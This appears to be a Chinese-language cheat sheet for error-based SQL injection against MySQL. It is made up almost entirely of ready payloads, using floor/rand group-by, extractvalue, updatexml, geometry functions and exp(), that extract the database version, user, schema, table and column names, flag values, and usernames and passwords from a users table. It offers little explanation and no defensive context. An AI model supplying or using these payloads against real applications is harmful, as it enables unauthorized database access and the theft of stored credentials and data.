SQL注入之报错注入

报错注入

通过floor报错注入

固定语句公式
union select 1 from (select+count(*),concat(floor(rand(0)*2),(注入爆数据语句))a from information_schema.tables group by a)b

例子

假如id输入存在注入的话，可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key 1

可以看到成功爆出了Mysql的版本

1、显示当前数据库名，登陆用户，数据库版本和数据路径

union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(0x3a,database(),0x3a,user(),0x3a,version(),0x3a,@@datadir)))a+from+information_schema.tables+group+by+a)b

获取所有的数据库名

union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(SELECT distinct concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e)+FROM+information_schema.SCHEMATA+LIMIT+0,1))a+from information_schema.tables+group+by+a)b

2、爆当前数据库中的表

union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1))a+from+information_schema.tables+group+by+a)b

3,爆字段

union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+column_name+from+information_schema.columns+where+table_name=表名+limit+0,1))a+from+information_schema.tables+group+by+a)b

4、爆内容

union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(0x3a,字段1,0x3a,字段2)+from+表名+limit+0,1))a+from+information_schema.tables+group+by+a)b

ExtractValue报错注入

测试语句

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

爆数据库版本

and extractvalue(1, concat(0x7e, (select @@version),0x7e))

1,爆数据库名

and extractvalue(1, concat(0x7e, (select user()),0x7e))

2,爆表名

and extractvalue(1, concat(0x7e, (select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1,1),0x7e))

3,爆字段名

and extractvalue(1, concat(0x7e, (select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x666c6167 limit 1,1),0x7e))

4,爆字段内容

and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,id,0x3a,flag,0x23) FROM flag limit 0,1)))

UpdateXml报错注入

1,爆数据库版本,用户

and updatexml(1,concat(0x7e,version(),user(),0x7e),1)

2,爆表

and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e),1)

3,爆字段

and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),0x7e),1)

4,爆字段内容

and updatexml(1,concat(0x7e,(select username from users limit 1,1),0x7e,(select password from users limit 1,1),0x7e),1)

geometrycollection()报错注入

and geometrycollection((select * from(select * from(select user())a)b));

multipoint()报错注入

and multipoint((select * from(select * from(select user())a)b));

olygon()报错注入

and polygon((select * from(select * from(select user())a)b));

multipolygon()报错注入

and multipolygon((select * from(select * from(select user())a)b));

linestring()报错注入

and linestring((select * from(select * from(select user())a)b));

multilinestring()报错注入

and multilinestring((select * from(select * from(select user())a)b));

exp()报错注入

and exp(~(select * from(select user())a));